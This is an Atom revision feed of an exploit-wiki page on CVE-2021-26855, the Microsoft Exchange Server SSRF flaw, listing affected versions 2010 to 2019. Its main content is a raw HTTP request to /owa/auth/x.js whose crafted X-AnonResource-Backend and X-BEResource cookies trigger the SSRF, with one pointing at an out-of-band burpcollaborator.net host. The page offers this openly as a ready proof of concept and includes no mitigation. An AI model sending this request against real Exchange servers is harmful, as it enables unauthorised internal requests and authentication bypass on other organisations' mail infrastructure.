https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2021-26855_-_Exchange_Server_SSRF%E6%BC%8F%E6%B4%9E%2Fen
CVE-2021-26855 - Exchange Server SSRF漏洞/en - Revision history
2026-04-08T09:02:20Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2021-26855_-_Exchange_Server_SSRF%E6%BC%8F%E6%B4%9E/en&diff=224&oldid=prev
Pwnwiki: 建立內容為「CVE-2021-26855-Exchange Server SSRF vulnerability」的新頁面
2021-03-08T05:33:07Z
<p>建立內容為「CVE-2021-26855-Exchange Server SSRF vulnerability」的新頁面</p>
<p><b>New page</b></p><div><languages /><br />
<br />
==Introduction to Vulnerability==<br />
Exchange server-side request forgery (SSRF) vulnerability, an attacker exploiting this vulnerability can send arbitrary HTTP requests and authenticate through Exchange Server.<br />
<br />
<br />
==Scope of influence==<br />
<br />
Microsoft Exchange Server: 2010<br />
<br />
Microsoft Exchange Server: 2013<br />
<br />
Microsoft Exchange Server: 2016<br />
<br />
Microsoft Exchange Server: 2019<br />
<br />
<br />
<br />
==SSRF==<br />
<pre><br />
GET /owa/auth/x.js HTTP/1.1<br />
Host: 0.0.0.0<br />
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0<br />
Cookie: X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;<br />
Accept-Language: en<br />
Connection: close<br />
</pre><br />
<br />
[[檔案:Ssrf.jpg]]</div>
Pwnwiki